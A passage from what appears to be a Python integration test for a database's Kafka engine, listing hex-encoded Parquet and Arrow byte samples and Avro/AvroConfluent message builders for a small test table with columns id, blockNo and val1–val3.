x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
b'\x50\x41\x52\x31\x15\x04\x15\xf0\x01\x15\x90\x01\x4c\x15\x1e\x15\x04\x12\x00\x00\x78\x04\x01\x00\x09\x01\x00\x02\x09\x07\x04\x00\x03\x0d\x08\x00\x04\x0d\x08\x00\x05\x0d\x08\x00\x06\x0d\x08\x00\x07\x0d\x08\x00\x08\x0d\x08\x00\x09\x0d\x08\x00\x0a\x0d\x08\x00\x0b\x0d\x08\x00\x0c\x0d\x08\x00\x0d\x0d\x08\x3c\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x14\x15\x18\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x24\x04\x05\x10\x32\x54\x76\x98\xba\xdc\x0e\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x1e\x19\x1c\x19\x5c\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\xa6\x06\x16\x1e\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc5\x01\x00\x00\x50\x41\x52\x31',
b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
],
},
'AvroConfluent': {
'data_sample': [
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
b''.join([avro_confluent_message(schema_registry_client,
{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1}) for id in range(1, 16)]),
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'extra_settings': ", format_avro_schema_registry_url='http://{}:{}'".format(
kafka_cluster.schema_registry_host,
8081
),
'supports_empty_value': True,
},
'Avro': {
# It seems impossible to send more than one avro file per a message
# because of nature of Avro: blocks go one after another
'data_sample': [
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
avro_message([{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1} for id in range(1, 16)]),
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'supports_empty_value': False,
},
'Arrow' : {
'data_sample' : [
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\